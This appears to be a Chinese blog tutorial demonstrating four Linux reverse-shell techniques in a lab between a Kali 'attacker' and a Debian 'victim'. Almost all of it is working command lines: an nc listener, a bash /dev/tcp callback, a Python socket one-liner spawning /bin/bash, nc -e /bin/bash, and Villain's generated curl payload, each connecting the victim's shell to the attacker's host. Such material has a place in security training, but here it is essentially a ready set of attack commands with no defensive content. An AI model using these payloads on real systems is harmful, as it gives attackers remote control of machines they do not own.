2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

实验环境准备(同一个网段下,我是桥接的虚拟机)

一、bash反弹shell

二、python反弹shell

三、nc反弹shell

四、villain反弹shell


实验环境准备(同一个网段下,我是桥接的虚拟机)

一台kali的linux(攻击者)

一台centos7/debian另一个linux(受害者)

一、bash反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

复制代码
nc -lvp 自定义端口号

2、debian(受害者)运行命令

复制代码
 bash -i >& /dev/tcp/攻击者主机的ip/自定义的端口号 0>&1

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

复制代码
whoami

二、python反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

复制代码
nc -lvp 自定义端口号

2、debian(受害者)运行命令

注意修改攻击者的ip和端口号

复制代码
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击者的主机ip',自定义的端口号));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

复制代码
whoami

三、nc反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

复制代码
nc -lvp 自定义端口号

2、debian(受害者)运行命令

复制代码
nc -e /bin/bash 攻击者ip 自定义的端口号

3、结果在kali这边输出,(这个不回显)我们可以直接执行whoami查看权限

复制代码
whoami

四、villain反弹shell

1、kali(攻击者)运行命令

①运行villain,需要先安装哦

复制代码
villain

②生成linux的payload命令复制灰色区域的文字到debian的命令行中

温馨提示:可以在villain中使用help generate查看windows的payload生成方法

复制代码
generate payload=linux/hoaxshell/sh_curl lhost=eth0

2、debian(受害者)复制并运行刚才生成的payload命令

3、结果在kali这边输出

②我们查看上线的主机

复制代码
sessions

②进入shell,shell session的英文编码id,控制一下debian(受害者)

复制代码
shell sessionID

③whoami看一下权限

复制代码
whoami
相关推荐
orion577 小时前
Missing Semester Class1:course overview and introduction of shell
linux
SkyWalking中文站12 小时前
认识 Horizon UI · 6/17:Trace 探索器
运维·监控·自动化运维
用户1204872216114 小时前
Linux驱动编译与加载
linux·嵌入式
程序员老赵15 小时前
服务器文件不想 SFTP 上传?Docker 跑个 File Browser,浏览器就能管理
服务器·docker·开源
火车叼位15 小时前
写给初级开发者:SSL、SSH、HTTPS 与证书体系全解析
运维
vivo互联网技术19 小时前
从 10 分钟到 1 秒:ES 深度分页任意跳页的三轮优化实战
服务器·数据库·redis·elasticsearch·深度分页
用户8055336980320 小时前
Input 子系统架构:Core、Handler、Driver 三层是怎么协作的
linux·嵌入式
用户8055336980320 小时前
RK-Forge外设系列开篇 - 把板子从「能启动」变成「能用」:Ethernet/SPI/MMC 三个纯接线外设
linux·github·嵌入式
小猿姐1 天前
唯品会大规模数据库云原生实践:基于 KubeBlocks 管理数千实例的统一运维之路
运维·elasticsearch·云原生